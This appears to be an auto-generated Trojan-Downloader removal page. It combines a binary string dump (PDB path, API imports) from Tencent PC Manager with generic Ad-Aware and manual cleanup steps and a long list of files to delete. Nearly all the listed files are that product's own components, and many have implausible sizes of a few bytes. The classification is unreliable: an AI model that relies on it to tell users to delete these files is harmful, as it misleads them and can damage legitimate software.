D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Output\BinFinal\Plugins\QMNetMon\QQPCNetFlow.pdb
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestExW
HttpEndRequestW
HttpSendRequestW
HttpAddRequestHeadersW
WININET.dll
WS2_32.dll
?DelIdleCallback@Window@Util@@YAJPAVVTXMsgLoopIdleCallback@@@Z
?AddIdleCallback@Window@Util@@YAJPAVVTXMsgLoopIdleCallback@@@Z
?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z
?SetBugReportUin@TXBugReport@@YAXKPB_W@Z
?ValidateBugReport@TXBugReport@@YAXXZ
?OnConnected@CTXHttpDownloadSink@@UAEXPAVCTXHttpDownload@@@Z
?OnConnecting@CTXHttpDownloadSink@@UAEXPAVCTXHttpDownload@@PB_W@Z
??0CTXHttpDownload@@QAE@XZ
??1CTXHttpDownload@@UAE@XZ
??0CTXHttpDownloadSink@@IAE@XZ
??1CTXHttpDownloadSink@@UAE@XZ
?SetUIInterface@CTXHttpDownload@@QAEXPAVCTXHttpDownloadSink@@@Z
?SetEventMask@CTXHttpDownload@@QAEXE@Z
?Download@CTXHttpDownload@@QAEHPB_WPAU_SYSTEMTIME@@0H@Z
?CancelDownload@CTXHttpDownload@@QAEXXZ
?GetDownloadedFilePath@CTXHttpDownload@@QAEHAAVCTXStringW@@@Z
?OnRedirected@CTXHttpDownloadSink@@UAEXPAVCTXHttpDownload@@PB_W@Z
?OnDownloadStart@CTXHttpDownloadSink@@UAEXPAVCTXHttpDownload@@KK@Z
Common.dll
GF.dll
xGraphic32.dll
GetProcessHeap
CreateIoCompletionPort
WaitNamedPipeW
SetNamedPipeHandleState
CreateNamedPipeW
ConnectNamedPipe
KERNEL32.dll
EnumThreadWindows
MsgWaitForMultipleObjectsEx
USER32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegFlushKey
RegNotifyChangeKeyValue
RegGetKeySecurity
RegSetKeySecurity
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
ATL80.DLL
QQPCRealTimeSpeedup.exe_4488:
QQPCRealTimeSpeedup.exe_4488_rwx_00170000_00002000:
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan the system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
- Delete the original Trojan-Downloader file.
- Delete or disinfect the following files created/modified by the Trojan-Downloader:
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libpng.dll (1215 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\tab_icon_sys_opt_sys_homepage.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCWifiSafe.png (816 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HW_GameScore.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1227.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_949.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicNet.png (883 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMRepairPlugin.dll (1793 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMKCheck\QMKCheck.dll (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libpng.dll (643 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\TraceClear.rdb (158 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUAgent.dll (4091 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1099.dat (447 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysspeedupjmp\SysSpeedUpJmp.dll (405 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt64.dll (6370 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginInstaller.exe (2528 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMLogCtrl\QMLogCtrl.rdb (158 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPVulScan\HPVulScan.dll (1029 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\unstag.etf (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFileMon.dll (6571 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVUpload.dll (4333 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUL.dll (3677 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextScan.dll (1674 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1200.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.rdb (317 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.rdb (273 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\MyPhone_Notify.ico (292 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\QQPCLaunch.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetConnect\QMNetConnectDll.dll (1270 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysOptimize.png (597 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1023.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1002.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\whitelist.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.rdb (97 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLP.dat (688 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOAccelerator.sys (2520 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.rdb (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_691.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCTray.exe (2818 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MemDefragWhiteList.etf (211 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMalCoreCfgV1.dat (3714 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\AppMarketPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernel64.sys (1025 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQSysMon.sys (2373 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHardware.dll (3699 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.tpc (698 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_571.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_112.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_794.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOPlatform.dll (13792 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterMgr.exe (2794 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.rdb (1729 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOLUIControl.dll (5819 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSRunner.DAT (717 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\PrefetchConfig.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp_64.sys (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.rdb (19 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1604.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginInfo.xml (37 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSysOptimize.dat (848 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\softmgr.ico (289 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssLibHlp.dll (1613 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp6.sys (27 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\Common.dll (28727 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSecScanLib.dll (216 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1034.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1302.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.tpc (676 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle57.png (852 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.tpc (723 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\xGraphic32.dll (2012 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.rdb (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\DNFConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libjpegturbo.dll (3859 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Win10ToastNotification.dll (3603 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.tpc (703 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMGameSpeedup.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMinfo.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.rdb (59 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTask.dat (600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (468 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDeskTopGC.exe (5831 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.rdb (7972 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpcuninstalljump.png (256 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SXComBase.dll (2097 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1096.dat (449 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbOVList.etf (411 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdFilter.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.tpc (721 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.rdb (118 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSLogPolicy.dll (1306 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QMNetMonDll.dll (62 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_898.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTencentNews.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\NetMon.png (424 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FilterService.ini (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hptrojanscan\HPTrojanScanInfo.xml (62 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy (808 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.rdb (79 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\syshomepage.tpc (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.exe (8779 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SMobileAssisCfg.etf (323 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\jgImage.dll (716 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_131.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCClinic_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1026.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.rdb (1624 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSService.dll (4987 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1106.dat (453 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsmcp.DAT (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\QQMobileMgr.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\WebShieldCFG.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbSGList.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMExt.dll (1769 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1016.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1301.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\xpword.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1012.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GarbageClearV2.dat (155 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPInternalScan\HPInternalScan.dll (2208 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.dll (4997 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1500.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1406.dat (969 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMWebFWCfg.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_133.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_352.png (2 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\jsfeature.xml (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\SysHomePage.dll (23169 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\Startup.etf (1826 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tscpm.sys (1193 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftPolicy.etf (296 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\zlib.dll (567 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1412.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.exe (6273 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUsbGuard.dat (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\UpdateTrayIcon.exe (2228 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMonPlugin.dll (1642 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSFSEngine.DAT (104 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\SysHomePage.rdb (7972 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.tpc (763 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\FIFAConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelEx.sys (2496 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.dll (10652 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_479.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibexcept.xml (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libexpatw.dll (1184 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSuperScan.EXE (1810 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameUpgradeTrayPlugin\GameUpgradeTrayPlugin.dll (3518 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\NetworkFixInfo.xml (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1405.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\Common.dll (20906 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOBusinessCfgV2.etf (617 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.dll (9480 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileUnlock.dll (33 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1015.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\logodef.ico (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\GFCustom.dll (10350 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_109.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmKit.dll (1889 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.dll (7706 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\DeskUpdate\GlobalMgr.db (190 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\dlcore.dll (17399 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.dll (6276 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSwitchesMgrPlugin\QMSwitchesMgrPlugin.dll (776 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDlder.dll (3807 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\bugreport_xf.exe (3814 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FastUninstScpt.etf (95 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\libjpegturbo.dll (2625 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScan.dll (3412 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileMon\x64\TFsFltX64.sys (953 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\xGraphic32.dll (1610 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.rdb (1704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1104.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextUninstall.dll (715 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScanLib.dat (782 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftGroup.etf (90 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\xImage.dll (2088 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ScUrConfig.dat (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DlForQd.dll (3350 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCNetFlow.rdb (6308 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1605.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\More.png (448 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCXPNOTIFY.rdb (1719 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibcss.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\RemoteAssistance.png (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysOptimize\QMTraceClear.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_663.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsskx64.sys (54 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.tpc (686 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1028.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpk.ini (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10483.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\libexpatw.dll (1195 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hpswscanplugin\HPSWScanPlugin.dll (3480 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.dll (2928 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsFltMgr.sys (1770 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_2000.dat (597 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.tpc (711 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulPage.dll (11307 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMonWfp64.sys (559 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMMobileSettingCenter\QMMobileSettingCenter.tpc (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\msvcp80.dll (6658 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.dll (3722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\AVEngine.ini (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\zlib.dll (145 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.rdb (50 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\NewPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libpng.dll (1843 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderInfo.dll (7875 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.dll (10358 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.rdb (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ProcessManager.dll (3261 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSpecTips\QMSpecTips.dll (3119 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMConnectTipsConfig.dat (520 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1227.dat (1 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle71.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOClient.dll (2383 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMAdBlock.png (653 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\CommonDef.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\MyPhone.ico (292 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCSoftMgr.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.dll (8515 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.tpc (723 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinic.exe (9760 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_565.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libexpatw.dll (1879 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCBTU.exe (577 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1003.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_127.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\UninstNetWork.dll (46 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\TencentNews.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmDrv.sys (49 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMProcessRunningTime.dll (1176 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRTP.exe (3557 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\videocardmark.etf (17 bytes)
